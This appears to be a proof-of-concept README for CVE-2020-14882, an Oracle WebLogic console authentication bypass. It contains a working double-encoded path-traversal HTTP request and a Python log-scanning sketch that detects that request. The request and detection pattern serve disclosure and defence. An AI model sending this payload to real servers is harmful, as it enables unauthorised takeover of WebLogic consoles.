[CVE-2020-14882] Oracle WebLogic Server Authentication Bypass

murataydemir/CVE-2020-14882

Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. This easily exploitable vulnerability allows an unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server.

GET /console/css/%252e%252e%252fconsole.portal HTTP/1.1
Host: vulnerablehost:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,zh;q=0.9
Connection: close
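
For defenders, the request above can be found in web access logs by percent-decoding each request path until it stops changing and then checking for a traversal segment that reaches `console.portal` from under `/console/`. The following detection sketch is an added example, not code from this repository; the log lines, the common-log-format assumption and all function names are constructed for illustration, and decoding to a fixed point generalizes the check beyond the exact encoding depth shown in the request.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines in common log format (not real traffic).
SAMPLE_LOG = [
    '198.51.100.10 - - [02/Nov/2020:09:14:01 +0000] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 3310',
    '198.51.100.10 - - [02/Nov/2020:09:14:09 +0000] "GET /console/console.portal HTTP/1.1" 302 0',
    '203.0.113.7 - - [02/Nov/2020:09:15:42 +0000] "GET /console/css/%252e%252e%252fconsole.portal HTTP/1.1" 200 8192',
    '198.51.100.22 - - [02/Nov/2020:09:16:03 +0000] "GET /console/css/login.css HTTP/1.1" 200 512',
]

REQUEST_RE = re.compile(r'^(?P<client>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def fully_decode(path, max_rounds=5):
    """Percent-decode until the value stops changing; return (decoded, rounds)."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(path)
        if decoded == path:
            break
        path, rounds = decoded, rounds + 1
    return path, rounds


def check_target(target):
    """Return the decode depth if the path matches the bypass pattern, else None."""
    path = target.split("?", 1)[0]
    decoded, rounds = fully_decode(path)
    lowered = decoded.lower()
    traversal = "../" in lowered or "..\\" in lowered
    if lowered.startswith("/console/") and traversal and "console.portal" in lowered:
        return rounds
    return None


def scan(lines):
    """Return (client, raw_target, decode_rounds) for every flagged request."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        rounds = check_target(m.group("target"))
        if rounds is not None:
            hits.append((m.group("client"), m.group("target"), rounds))
    return hits


if __name__ == "__main__":
    for client, target, rounds in scan(SAMPLE_LOG):
        print(f"ALERT client={client} decode_rounds={rounds} target={target}")
```

A decode depth of 2 or more is itself worth alerting on, since ordinary console traffic does not double-encode path separators.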
